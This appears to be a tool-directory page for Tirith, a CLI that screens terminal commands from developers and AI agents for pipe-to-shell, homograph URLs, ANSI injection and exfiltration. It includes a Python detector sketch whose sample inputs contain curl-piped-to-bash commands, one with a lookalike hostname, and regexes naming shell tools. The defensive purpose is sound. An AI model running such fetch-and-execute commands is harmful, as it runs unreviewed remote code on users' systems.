CLI Tools · May 12, 2026 · 2 min read

Tirith — Terminal Security for AI Agents

Tirith flags risky terminal commands for developers and AI agents—pipe-to-shell, ANSI injection, homograph URLs, and data exfiltration—before execution.

Needs Confirmation · 62/100 · Policy: confirm

  • Target: Claude Code
  • Kind: Cli
  • Install: Single
  • Trust: Established
  • Entrypoint: README.md

Universal CLI install command:

    npx tokrepo install b64aa0f0-2f92-4b9a-9b52-8cc0c6a5c8b3

Intro

  • Best for: teams running agent-driven shell commands who need guardrails against copy-paste supply-chain tricks
  • Works with: macOS/Linux/Windows installs, YAML policy files, shell hooks, optional MCP server mode and setup guides for popular AI CLIs
  • Setup time: 10–20 minutes

Practical Notes

  • README documents policy init/validate/test commands and a strictness model (paranoia 1–4).
  • Install options include Homebrew, npm, Cargo, and OS packages; policy discovery looks for .tirith/policy.yaml.

Where It Fits in an Agent Workflow

If you let an agent propose commands, Tirith can sit in front of execution:

  • Use policy tests during planning to catch “curl | bash” and similar source-to-sink flows early.
  • Keep a small allowlist (domains you trust) and blocklist (known bad) as code in your repo.
  • In CI, apply a stricter scan profile (README shows scan profiles under policy) for configs like .claude/*, mcp.json, and other agent-control files.

Practical “Do This, Not That”

  • Prefer pinned installs over curl | bash whenever possible.
  • If you must run a script installer, validate the URL first (homograph and invisible-Unicode characters are a real class of attacks) and record the checksum or release tag you used.
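
The URL validation described above can be sketched as follows. This is an added example, not Tirith's code or rule set: `review_command`, `hidden_chars`, the regexes and the sample commands are all constructed for illustration.

```python
import re
import unicodedata
from urllib.parse import urlsplit

# Illustrative heuristics only; these are not Tirith's rules or rule names.
URL_RE = re.compile(r"https?://[^\s'\"|;<>)]+")
PIPE_TO_SHELL_RE = re.compile(r"\|\s*(?:sudo\s+)?(?:ba|z|da|k)?sh\b")


def hidden_chars(text):
    """Names of format-control characters (zero-width, bidi overrides) in text."""
    return [unicodedata.name(c, hex(ord(c))) for c in text
            if unicodedata.category(c) == "Cf"]


def review_command(command, trusted_hosts=()):
    """Return a list of human-readable findings for one shell command line."""
    findings = []
    if PIPE_TO_SHELL_RE.search(command):
        findings.append("pipe-to-shell: downloaded content is executed unseen")
    for name in hidden_chars(command):
        findings.append(f"invisible character in command: {name}")
    for url in URL_RE.findall(command):
        host = urlsplit(url).hostname or ""
        if not host.isascii():
            # Mixed-script lookalikes (e.g. Cyrillic letters in a Latin name).
            findings.append(f"non-ASCII hostname (possible homograph): {host!r}")
        elif any(label.startswith("xn--") for label in host.split(".")):
            findings.append(f"punycode hostname, decode and inspect: {host}")
        if trusted_hosts and host not in trusted_hosts:
            findings.append(f"host not on allowlist: {host}")
    return findings


if __name__ == "__main__":
    # Constructed samples: the second hostname contains Cyrillic U+0456.
    samples = [
        "curl -fsSL https://example.com/install.sh | bash",
        "curl -fsSL https://g\u0456thub.com/org/tool/install.sh | sh",
        "git clone https://example.com/repo.git",
    ]
    for cmd in samples:
        print(ascii(cmd), "->", review_command(cmd, trusted_hosts={"example.com"}))
```
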

FAQ

Q: Does Tirith execute commands for me?
A: It can validate and policy-test commands; the goal is to surface risk before you run them.

Q: Where does the policy live?
A: The README states it discovers .tirith/policy.yaml in your repo (walking up), or a user config path.

Q: Can I tune strictness?
A: Yes. Policy parameters include a paranoia level and action overrides for escalation.

Source & Thanks

Source: https://github.com/sheeki03/tirith
License: AGPL-3.0
GitHub stars: 2,307 · forks: 80
